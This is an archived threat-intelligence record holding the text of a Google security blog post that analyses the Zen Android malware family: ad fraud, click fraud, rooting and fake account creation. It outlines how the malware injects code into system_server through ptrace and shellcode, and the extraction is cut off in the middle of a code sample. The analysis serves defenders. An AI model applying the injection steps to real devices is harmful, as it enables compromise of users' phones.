{
	"id": "a4c5966b-dd36-496c-8a0d-82bdb14a3e5f",
	"created_at": "2026-04-06T01:31:32.0908Z",
	"updated_at": "2026-04-10T13:11:42.55154Z",
	"deleted_at": null,
	"sha1_hash": "3dc9dab3087615a159907d75e0633e9e244959ed",
	"title": "PHA Family Highlights: Zen and its cousins",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 366077,
	"plain_text": "PHA Family Highlights: Zen and its cousins\r\nPublished: 2019-01-11 · Archived: 2026-04-06 00:16:53 UTC\r\nPosted by Lukasz Siewierski, Android Security \u0026 Privacy Team Google Play Protect detects Potentially Harmful\r\nApplications (PHAs) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to\r\nuser data—commonly referred to as \"malware.\" in a variety of ways, such as static analysis, dynamic analysis, and machine\r\nlearning. While our systems are great at automatically detecting and protecting against PHAs, we believe the best security\r\ncomes from the combination of automated scanning and skilled human review. With this blog series we will be sharing our\r\nresearch analysis with the research and broader security community, starting with the PHA family, Zen. Zen uses root\r\npermissions on a device to automatically enable a service that creates fake Google accounts. These accounts are created by\r\nabusing accessibility services. Zen apps gain access to root permissions from a rooting trojan in its infection chain. In this\r\nblog post, we do not differentiate between the rooting component and the component that abuses root: we refer to them\r\ninterchangeably as Zen. We also describe apps that we think are coming from the same author or a group of authors. All of\r\nthe PHAs that are mentioned in this blog post were detected and removed by Google Play Protect.\r\nBackground\r\nUncovering PHAs takes a lot of detective work and unraveling the mystery of how they're possibly connected to other apps\r\ntakes even more. PHA authors usually try to hide their tracks, so attribution is difficult. Sometimes, we can attribute\r\ndifferent apps to the same author based on a small, unique pieces of evidence that suggest similarity, such as a repetition of\r\nan exceptionally rare code snippet, asset, or a particular string in the debug logs. Every once in a while, authors leave behind\r\na trace that allows us to attribute not only similar apps, but also multiple different PHA families to the same group or person.\r\nHowever, the actual timeline of the creation of different variants is unclear. In April 2013, we saw the first sample, which\r\nmade heavy use of dynamic code loading (i.e., fetching executable code from remote sources after the initial app is\r\ninstalled). Dynamic code loading makes it impossible to state what kind of PHA it was. This sample displayed ads from\r\nvarious sources. More recent variants blend rooting capabilities and click fraud. As rooting exploits on Android become less\r\nprevalent and lucrative, PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud. This post\r\ndoesn't follow the chronological evolution of Zen, but instead covers relevant samples from least to most complex.\r\nApps with a custom-made advertisement SDK\r\nThe simplest PHA from the author's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic. By proxying all requests through a custom server, the real source of ads is opaque. This example\r\nshows one possible implementation of this technique.\r\n This\r\napproach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps.\r\nIt may even allow them to sell ad space directly to application developers. The advertisement SDK also collects statistics\r\nabout clicks and impressions to make it easier to track revenue. Selling the ad traffic directly or displaying ads from other\r\nsources in a very large volume can provide direct profit to the app author from the advertisers. We have seen two types of\r\napps that use this custom-made SDK. The first are games of very low quality that mimic the experience of popular mobile\r\ngames. While the counterfeit games claim to provide similar functionality to the popular apps, they are simply used to\r\ndisplay ads through a custom advertisement SDK. The second type of apps reveals an evolution in the author's tactics.\r\nInstead of implementing very basic gameplay, the authors pirated and repackaged the original game in their app and bundled\r\nwith it their advertisement SDK. The only noticeable difference is the game has more ads, including ads on the very first\r\nscreen. In all cases, the ads are used to convince users to install other apps from different developer accounts, but written by\r\nthe same group. Those apps use the same techniques to monetize their actions.\r\nClick fraud apps\r\nThe authors' tactics evolved from advertisement spam to real PHA (Click Fraud). Click fraud PHAs simulate user clicks on\r\nads instead of simply displaying ads and waiting for users to click them. This allows the PHA authors to monetize their apps\r\nmore effectively than through regular advertising. This behavior negatively impacts advertisement networks and their clients\r\nhttps://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nPage 1 of 6\n\nbecause advertising budget is spent without acquiring real customers, and impacts user experience by consuming their data\nplan resources. The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an\nadditional SDK. The command \u0026 control server (C\u0026C server) returns the URL to click along with a very long list of\nadditional parameters in JSON format. After rendering the ad on the screen, the app tries to identify the part of the\nadvertisement website to click. If that part is found, the app loads Javascript snippets from the JSON parameters to click a\nbutton or other HTML element, simulating a real user click. Because a user interacting with an ad often leads to a higher\nchance of the user purchasing something, ad networks often \"pay per click\" to developers who host their ads. Therefore, by\nsimulating fraudulent clicks, these developers are making money without requiring a user to click on an advertisement. This\nexample code shows a JSON reply returned by the C\u0026C server. It has been shortened for brevity.\n{\n \"data\": [{\n \"id\": \"107\",\n \"url\": \"\",\n \"click_type\": \"2\",\n \"keywords_js\": [{\n \"keyword\": \"\n\nif (!title.containsKey(new String(android.util.Base64.decode(\"SG93IHlvdeKAmWxsIHNpZ24gaW4=\".getBytes(), 0)\r\n if (!title.containsKey(\"Create password\")) {\r\n if (!title.containsKey(\"Add phone number\")) {\r\nApart from injecting code to read the CAPTCHA, the app also injects its own code into the system_server process, which\r\nrequires root privileges. This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app\r\nprocess name or does not have the ability to scan the memory of the system_server process. The app also creates hooks to\r\nprevent the phone from rebooting, going to sleep or allowing the user from pressing hardware buttons during the account\r\ncreation process. These hooks are created using the root access and a custom native code called Lmt_INJECT , although the\r\nalgorithm for this is well known. First, the app has to turn off SELinux protection. Then the app finds a process id value for\r\nthe process it wants to inject with code. This is done using a series of syscalls as outlined below. The \"source process\" refers\r\nto the Zen trojan running as root, while the \"target process\" refers to the process to which the code is injected and [pid]\r\nrefers to the target process pid value.\r\n1. The source process checks the mapping between a process id and a process name. This is done by reading the\r\n/proc/[pid]/cmdline file. This very first step fails in Android 7.0 and higher, even with a root permission. The\r\n/proc filesystem is now mounted with a hidepid=2 parameter, which means that the process cannot access other\r\nprocess /proc/[pid] directory .\r\n2. A ptrace_attach syscall is called. This allows the source process to trace the target.\r\n3. The source process looks at its own memory to calculate the offset between the beginning of the libc library and\r\nthe mmap address.\r\n4. The source process reads /proc/[pid]/maps to find where libc is located in the target process memory. By\r\nadding the previously calculated offset, it can get the address of the mmap function in the target process memory.\r\n5. The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process.\r\nIt uses the same technique as it used to determine the offset to the mmap function.\r\n6. The source process writes the native shellcode into the memory region allocated by mmap . Additionally, it also\r\nwrites addresses of dlopen , dlsym , and dlclose into the same region, so that they can be used by the shellcode.\r\nShellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that\r\nfile and run it.\r\n7. The source process changes the registers in the target process so that PC register points directly to the shellcode. This\r\nis done using the ptrace syscall.\r\nhttps://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nPage 3 of 6\n\nThis diagram illustrates the whole process.\r\nSummary\r\nPHA authors go to great lengths to come up with increasingly clever ways to monetize their apps. Zen family PHA authors\r\nexhibit a wide range of techniques, from simply inserting an advertising SDK to a sophisticated trojan. The app that resulted\r\nin the largest number of affected users was the click fraud version, which was installed over 170,000 times at its peak in\r\nFebruary 2018. The most affected countries were India, Brazil, and Indonesia. In most cases, these click fraud apps were\r\nuninstalled by the users, probably due to the low quality of the apps. If Google Play Protect detects one of these apps,\r\nGoogle Play Protect will show a warning to users. We are constantly on the lookout for new threats and we are expanding\r\nour protections. Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically\r\nand periodically scanned by our solutions. You can check the status of Google Play Protect on your device:\r\n1. Open your Android device's Google Play Store app.\r\n2. Tap Menu\u003ePlay Protect.\r\n3. Look for information about the status of your device.\r\nhttps://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nPage 4 of 6\n\nHashes of samples\r\nType Package name SHA256 digest\r\nCustom\r\nads\r\ncom.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d4403\r\nClick\r\nfraud\r\ncom.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5\r\nRooting\r\ntrojan\r\ncom.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327\r\nhttps://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nPage 5 of 6\n\nZen\r\ntrojan\r\ncom.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a09\r\nSource: https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nhttps://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html"
	],
	"report_names": [
		"pha-family-highlights-zen-and-its.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439092,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3dc9dab3087615a159907d75e0633e9e244959ed.pdf",
		"text": "https://archive.orkl.eu/3dc9dab3087615a159907d75e0633e9e244959ed.txt",
		"img": "https://archive.orkl.eu/3dc9dab3087615a159907d75e0633e9e244959ed.jpg"
	}
}